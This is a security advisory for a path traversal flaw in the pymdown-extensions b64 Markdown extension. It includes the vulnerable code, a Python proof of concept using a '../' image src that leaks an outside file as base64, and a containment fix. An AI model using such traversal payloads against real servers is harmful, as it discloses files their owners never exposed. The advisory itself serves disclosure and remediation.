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GHSA-9xwg-3r6f-jcx2
No affected components available
Summary
The b64 extension inlines images referenced by <img src="..."> as base64 data URIs. When resolving the src path it joins it onto the configured base_path with os.path.normpath and opens the result directly, with no check that the resolved path stays inside base_path. A src containing ../ sequences, or an absolute path, therefore reads a file outside base_path as long as that file has an allowed image extension (.png, .jpg, .jpeg, .gif, .svg). The base64 of that file is then embedded in the rendered output, disclosing its contents.
This is a separate code path from the snippets traversal issues (GHSA-jh85-wwv9-24hv, GHSA-62q4-447f-wv8h). It lives in pymdownx/b64.py and has no path restriction of any kind. Confirmed on 10.21.3 installed from PyPI.
Details
In pymdownx/b64.py, function repl_path (around lines 68 to 90 on main):
if is_absolute:
file_name = os.path.normpath(path) # absolute src: base_path ignored entirely
else:
file_name = os.path.normpath(os.path.join(base_path, path)) # relative src: '../' escapes base_path
if os.path.exists(file_name):
ext = os.path.splitext(file_name)[1].lower()
for b64_ext in file_types:
if ext in b64_ext:
with open(file_name, "rb") as f: # opened with no containment check
...
There is no startswith(base_path), no os.path.realpath comparison, and no rejection of ... Both branches are reachable from an attacker-controlled src.
PoC
Reproduced against an unmodified pymdown-extensions==10.21.3 from PyPI. The script creates a base_path directory and a PNG one level above it, then renders Markdown whose image src points outside base_path, and confirms the outside file's bytes appear base64-encoded in the output.
import base64, os, shutil, tempfile, markdown
root = tempfile.mkdtemp()
base_path = os.path.join(root, "docs"); os.makedirs(base_path)
outside = os.path.join(root, "secret"); os.makedirs(outside)
png = base64.b64decode(
"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk"
"+M9QDwADhgGAWjR9awAAAABJRU5ErkJggg=="
)
with open(os.path.join(outside, "secret.png"), "wb") as f:
f.write(png)
md = markdown.Markdown(
extensions=["pymdownx.b64"],
extension_configs={"pymdownx.b64": {"base_path": base_path}},
)
html = md.convert('<img src="../secret/secret.png">')
assert base64.b64encode(png).decode() in html, "not leaked"
print("LEAKED:", html)
Output:
LEAKED: <p><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQ..."></p>
The base64 of a file outside base_path is present in the output. The absolute-path branch behaves the same way: an absolute src bypasses base_path entirely via os.path.normpath(path). Both were confirmed leaking.
Impact
An application that renders untrusted Markdown with pymdownx.b64 enabled exposes the contents of image-extension files on the server, or any path the process can read, to whoever controls the Markdown and whoever views the output. The reach is bounded by the image-extension check, so it is a targeted file read rather than full arbitrary read, but it still discloses file contents that were never meant to be exposed.
Suggested fix
Resolve the real path and require it to stay within base_path before opening:
file_name = os.path.realpath(os.path.join(base_path, path))
base_real = os.path.realpath(base_path)
if file_name != base_real and not file_name.startswith(base_real + os.sep):
return m.group(0) # leave the tag untouched; do not read outside base_path
The same containment check should apply to the absolute-path branch rather than trusting an absolute src. Using realpath instead of abspath also closes the related symlink-following gap in the snippets handler.
The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a low impact on the confidentiality of the information.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
Probability that this vulnerability will be exploited in the wild within the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
- CVE-2026-61632Alias
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